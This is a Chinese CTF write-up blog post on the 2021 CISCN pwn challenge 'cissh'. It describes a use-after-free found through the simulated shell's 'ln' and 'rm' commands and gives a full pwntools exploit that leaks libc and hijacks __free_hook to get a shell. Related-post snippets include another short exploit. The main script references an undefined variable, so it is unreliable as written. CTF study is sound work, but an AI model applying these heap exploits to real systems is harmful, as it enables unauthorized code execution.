2021 ciscn day2 pwn cissh

于 2021-09-01 08:38:51 发布
阅读量197 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/120011353
版权

在这里插入图片描述
保护都健在。

在这里插入图片描述
庞大的C++以及复杂的结构体注定了这道题的思路就只能是连猜带蒙。

刚进来简简单单几行
在这里插入图片描述但是旁边的函数条告诉我事情并不是那么简单。

这几行里面首先是一个welcome,没啥说的。
然后看起来是定义了一个manager的结构体,然后下一行是通过结构体得到了一个__shared_ptr_access一个指针。

manager结构体里面也确实有一个那个名字的指针
在这里插入图片描述
指针再进去是一个函数,函数里面就又是一大堆乱七八糟。

在这里插入图片描述

你会发现有个函数多次出现

在这里插入图片描述然后再怎么样就不知道了,那我们回去看看下面的主逻辑程序。

在这里插入图片描述有个输出有个输入,然后再执行execute。

在这里插入图片描述然后就又是一堆。

逻辑分析的清清楚楚是万万做不到的,仅仅是大概发现
在这里插入图片描述
从输入里取了个啥然后跟traits取出来的比对,然后大概是执行的样子。

找到traits里面有啥。

在这里插入图片描述
有个函数表,那么我们就猜测就是执行类似于linux命令的代码而已。

程序中存在 ln 操作可以软链接一个文件,但是源文件删除后 ln 后的内容仍然存在,通过盲测触发了一个 double free 报错

这意味着文件“b”还在使用文件“a”的数据指针,存在 UAF

有了 UAF 之后就直接填满 Tcache 后利用 unsortedbin 泄露出 libc_base,再修改 tcache 的 next 指针为__free_hook,两次申请后得到__free_hook,劫持__free_hook就好啦。

exp

from pwn import *

context.log_level = "debug"

r = process("./cissh")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.31-0ubuntu9.2_amd64/libc.so.6")

def touch(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "touch " + name)

def vi(name, content):
    r.sendlineafter("\x1B[31m$ \x1B[m", "vi " + name)
    r.sendline(content)

def cat(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "cat " + name)

def ln(name1, name2):
    r.sendlineafter("\x1B[31m$ \x1B[m", "ln " + name1 + " " + name2)

def rm(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "rm " + name)

for i in range(8):
    name = 'a' + str(i)
    touch(name)
    vi(name, str(i) * 0x100)
    
ln('b', 'b')
ln('c', 'c')

for i in range(8):
    name = 'a' + str(i)
    rm(name)

cat('b')
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

vi('c', p64(free_hook_addr))
touch('d')
vi('d', '/bin/sh\x00' * (0x100 // 8))
touch('e')
vi('e', p64(system_addr) * (0x100 // 8))
rm('d')
    
r.interactive()
yongbaoii
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Gitlab CI/CD 中使用 ssh-key,登录远程主机部署,执行远程主机的特定脚本
知无涯
05-22 3706
在开发流水线,完成部署作业时,有时需要在流水线构建环境中下载其他项目的代码,并修改推送。也可能将构建物传输到一个远程主机上,或者登录到远程主机执行一段部署脚本。都是要使用以下这段作业来完成。当然首先需要构建免密通道。
乱七八糟的pwn入门(二)——1.fd
Z_Pathon的博客
08-06 667
审题 环境配好了,要开始做第一道题了,好激动。让我们打开pwnable.kr,看第一道题。 第一题的题目如下: 小学养成的好习惯,先审题。可以看到,题目上问,linux的“file descriptor”是啥? 是啥?俺也不知道,俺也不想问。这个时候先查资料有点无聊,又看到最下面给了一行命令: ssh fd@pwnable.kr -p2222 ...
ssh 命令_gitlab配置ci自动执行ssh构建命令
weixin_39805529的博客
11-30 1072
前言gitlab提供了免费的ci功能,可以持续集成,通过简单的配置,我们能用ci调用ssh,在远程服务器执行命令。比如重启容器之类的简单任务配置找到项目的Settings -> CI/CD->Variables,添加一个名为SSH_PRIVATE_KEY的变量,内容为你的ssh 私匙,确保能通过该私匙登陆你的ssh服务器然后编辑你项目的.gitlab-ci.yml配置文件job1: ...
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1428
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
【黑客】pwn简介与入门
yeluoxiang的专栏
06-05 1678
作为一个刚刚工作两年的新生代程序员,还是喜欢接触一些新鲜事物的。前不久买了一个ruff的开发板,可以用js来控制硬件,官网如下https://ruff.io/zh-cn/...
pwnciscn_2019_s_4
Nothing
03-06 769
main函数,存在八个字节溢出,栈迁移,第一次泄露ebp,得到栈上buf地址,迁移到buf即可。 from pwn import * io=remote('node3.buuoj.cn',28060) leave=0x8048562 sys_plt=0x8048400 pl1='a'*0x24+'bbbb' io.send(pl1) io.recvuntil('bbbb') ebp=u32(...
pwnciscn_2019_s_3
Nothing
12-14 4534
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CISCN 2020 Final Day2 pwn3思路分享 .pdf
09-05
CISCN 2020 Final Day2 pwn3思路分享》 本文主要探讨的是在CISCN 2020网络安全大赛第二天的pwn3挑战中的解题思路,涉及的是利用漏洞进行安全对抗的技术。该挑战的核心在于对二进制程序的深入理解和巧妙利用,以...
ciscn_2021_lonelywolf.zip
05-17
lonelywolf.zip”这个文件名暗示了这是一个与2021年全国大学生信息安全竞赛相关的资源,其中“ciscn”可能代表了“Chinese Internet Security Contest”,而“lonelywolf”可能是该竞赛中某一题目或团队的代号,特别...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1330
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
乱七八糟的pwn入门(六)——5.passcode
Z_Pathon的博客
09-02 662
审题 首先看题目: 连上服务器,看一下这次的代码: #include <stdio.h> #include <stdlib.h> void login(){ int passcode1; int passcode2; printf("enter passcode1 : "); scanf("%d", passcode1); fflus...
centos7 ssh gitlab自动构建 CI/CD 免密登录
u014520797的专栏
09-06 2539
环境背景:现有A,B两台服务器。A有gitlab,B是部署环境,需要在A环境上执行shell脚本,shell脚本中包含ssh roo@*.*.*.*等等, 此时需要ssh 免密登录。 1、 在A上执行:ssh-keygen -t rsa 一切默认,不用输入密码,生成两个文件: /root/.ssh/id_rsa /root/.ssh/id_rsa.pub...
使用Travis-ci自动SSH部署vue代码
weixin_34029680的博客
02-21 670
本文摘自使用Travis-ci自动SSH部署代码和使用 travis 自动部署 vuejs 项目 1. 从手动部署到自动部署 在整个代码部署的道路上,我经历了手动部署到shell半自动部署再到现在的Travis自动部署。 1.1 石器时代 - 手动部署 很早很早之前,我采用完全手动的方式部署代码: 这个过程中我需要,先在本地编写并调试代码然后上传到Git服务器上,再手动SSH登录机器通过git ...
pwnable.kr 入门pwn系列教程(1)
NoOneGroup
07-24 3100
博客已经转移 https://noone-hub.github.io/ 前言: 前段时间学了一段时间pwn,因为某些事断了下来,现在开始重新学习,现在立志要真正入门pwn,会编写漏洞利用(利用pwntools),会基本linux命令,因为pwn题目很多都是在linux下的,比较少在windows下。 正文: 今天通过pwnable.kr的第一道题目fd来学习pwn 题目就是这样,题目最...
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8196
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
ctfshow的pwn2
最新发布
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag文件。 2. 使用cat命令打开flag文件,成功拿到flag。 3. 接下来,构造exp,引用中给出了一个使用pwntools库构造的exp示例。其中,使用remote函数连接到pwn.challenge.ctf.show的28025端口。 4. 设置bk变量的值为0x804850f。 5. 构造payload,其中包含了"a"*(0x9 0x4)和p32(bk)。 6. 使用sendline函数发送payload。 7. 使用interactive函数与远程主机进行交互。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值